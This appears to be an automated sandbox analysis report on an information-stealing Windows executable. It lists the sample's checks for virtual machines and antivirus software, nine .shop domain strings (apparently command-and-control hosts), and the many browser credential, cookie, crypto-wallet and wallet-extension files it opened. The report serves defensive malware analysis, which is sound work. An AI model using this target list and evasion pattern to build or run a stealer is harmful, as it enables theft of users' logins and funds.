          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeSystem information queried: FirmwareTableInformationJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exe TID: 7412Thread sleep time: -150000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exe TID: 7432Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\CommsJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\PackagesJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\CEFJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\MozillaJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\PeerDistRepubJump to behavior
          Source: Amcache.hve.3.drBinary or memory string: VMware
          Source: Amcache.hve.3.drBinary or memory string: VMware Virtual USB Mouse
          Source: Amcache.hve.3.drBinary or memory string: vmci.syshbin
          Source: Amcache.hve.3.drBinary or memory string: VMware, Inc.
          Source: Amcache.hve.3.drBinary or memory string: VMware20,1hbin@
          Source: Amcache.hve.3.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
          Source: Amcache.hve.3.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
          Source: Amcache.hve.3.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
          Source: LwnI84BBtb.exe, 00000000.00000002.1921447777.0000000001A7C000.00000004.00000020.00020000.00000000.sdmp, LwnI84BBtb.exe, 00000000.00000002.1921447777.0000000001AB7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: Amcache.hve.3.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
          Source: Amcache.hve.3.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
          Source: Amcache.hve.3.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
          Source: Amcache.hve.3.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
          Source: Amcache.hve.3.drBinary or memory string: vmci.sys
          Source: Amcache.hve.3.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
          Source: Amcache.hve.3.drBinary or memory string: vmci.syshbin`
          Source: Amcache.hve.3.drBinary or memory string: \driver\vmci,\driver\pci
          Source: Amcache.hve.3.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
          Source: Amcache.hve.3.drBinary or memory string: VMware20,1
          Source: Amcache.hve.3.drBinary or memory string: Microsoft Hyper-V Generation Counter
          Source: Amcache.hve.3.drBinary or memory string: NECVMWar VMware SATA CD00
          Source: Amcache.hve.3.drBinary or memory string: VMware Virtual disk SCSI Disk Device
          Source: Amcache.hve.3.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
          Source: Amcache.hve.3.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
          Source: Amcache.hve.3.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
          Source: Amcache.hve.3.drBinary or memory string: VMware PCI VMCI Bus Device
          Source: Amcache.hve.3.drBinary or memory string: VMware VMCI Bus Device
          Source: Amcache.hve.3.drBinary or memory string: VMware Virtual RAM
          Source: Amcache.hve.3.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
          Source: Amcache.hve.3.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 0_2_00435C40 LdrInitializeThunk,0_2_00435C40
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 0_2_01A4EEA3 push dword ptr fs:[00000030h]0_2_01A4EEA3
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 0_2_0365092B mov eax, dword ptr fs:[00000030h]0_2_0365092B
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeCode function: 0_2_03650D90 mov eax, dword ptr fs:[00000030h]0_2_03650D90

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: LwnI84BBtb.exeString found in binary or memory: demonstationfukewko.shop
          Source: LwnI84BBtb.exeString found in binary or memory: liabilitynighstjsko.shop
          Source: LwnI84BBtb.exeString found in binary or memory: alcojoldwograpciw.shop
          Source: LwnI84BBtb.exeString found in binary or memory: incredibleextedwj.shop
          Source: LwnI84BBtb.exeString found in binary or memory: shortsvelventysjo.shop
          Source: LwnI84BBtb.exeString found in binary or memory: shatterbreathepsw.shop
          Source: LwnI84BBtb.exeString found in binary or memory: tolerateilusidjukl.shop
          Source: LwnI84BBtb.exeString found in binary or memory: productivelookewr.shop
          Source: LwnI84BBtb.exeString found in binary or memory: strollheavengwu.shop
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: Amcache.hve.3.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
          Source: Amcache.hve.3.drBinary or memory string: msmpeng.exe
          Source: Amcache.hve.3.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
          Source: LwnI84BBtb.exe, 00000000.00000002.1921447777.0000000001AB7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: les%\Windows Defender\MsMpeng.exe
          Source: LwnI84BBtb.exe, 00000000.00000003.1752823927.0000000004212000.00000004.00000800.00020000.00000000.sdmp, LwnI84BBtb.exe, 00000000.00000003.1733500027.0000000004212000.00000004.00000800.00020000.00000000.sdmp, LwnI84BBtb.exe, 00000000.00000003.1736966432.0000000004212000.00000004.00000800.00020000.00000000.sdmp, LwnI84BBtb.exe, 00000000.00000003.1752912015.0000000004214000.00000004.00000800.00020000.00000000.sdmp, LwnI84BBtb.exe, 00000000.00000002.1922024465.0000000004215000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
          Source: Amcache.hve.3.drBinary or memory string: MsMpEng.exe
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
          Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
          Source: LwnI84BBtb.exe, 00000000.00000002.1921447777.0000000001AB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum\wallets
          Source: LwnI84BBtb.exe, 00000000.00000002.1921447777.0000000001B0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: .json", "window-state.json"],
          Source: LwnI84BBtb.exe, 00000000.00000002.1921447777.0000000001B0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
          Source: LwnI84BBtb.exe, 00000000.00000002.1921447777.0000000001AB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
          Source: LwnI84BBtb.exe, 00000000.00000002.1921447777.0000000001B0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Exodus
          Source: LwnI84BBtb.exe, 00000000.00000002.1921447777.0000000001AB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
          Source: LwnI84BBtb.exe, 00000000.00000002.1921447777.0000000001B0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
          Source: LwnI84BBtb.exe, 00000000.00000002.1921447777.0000000001B0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
          Source: C:\Users\user\Desktop\LwnI84BBtb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
